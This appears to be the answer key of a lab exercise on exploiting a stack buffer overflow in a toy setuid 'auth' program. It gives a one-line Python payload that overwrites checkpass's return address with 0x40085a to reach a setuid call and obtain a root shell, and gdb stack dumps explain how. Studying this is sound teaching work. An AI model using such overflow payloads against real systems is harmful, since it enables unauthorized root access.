a
    That would be 0x40085a.

b
    Done. That gives a root shell:

    $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')"
    ERROR: password incorrect
    # 
    Segmentation fault

c
    The return address of checkpass has been overwritten with the address of the
    setuid call. So, after checkpass has run normally, it 'returns' to that
    setuid call instead of to its caller. This explains why we don't read
    "Starting root shell".

        (gdb) ...
        0x000000000040082d  14      strcpy(password,input);
           0x000000000040082a <checkpass+10>:   48 89 e7    mov    rdi,rsp
        => 0x000000000040082d <checkpass+13>:   e8 0e fe ff ff  call   0x400640 <strcpy@plt>
        (gdb) x /64bx ($rsp+256)
        0x7ffe5af18c50: 0x40    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
    --> 0x7ffe5af18c58: 0xf2    0x06    0x40    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
        (gdb) ni
        15      hash1 = crypt(password,"$6$1122334455667788$");
        => 0x0000000000400832 <checkpass+18>:   be 24 09 40 00  mov    esi,0x400924
           0x0000000000400837 <checkpass+23>:   48 89 e7    mov    rdi,rsp
           0x000000000040083a <checkpass+26>:   e8 41 fe ff ff  call   0x400680 <crypt@plt>
        (gdb) x /64bx ($rsp+256)
        0x7ffe5af18c50: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
    --> 0x7ffe5af18c58: 0x5a    0x08    0x40    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00

    The relevant line is marked with -->. Before the strcpy, it holds the original
    return address (the little-endian bytes f2 06 40 00 ... read as 0x4006f2).
    After the strcpy, it holds the address we supplied (5a 08 40 00 ..., i.e.
    0x40085a).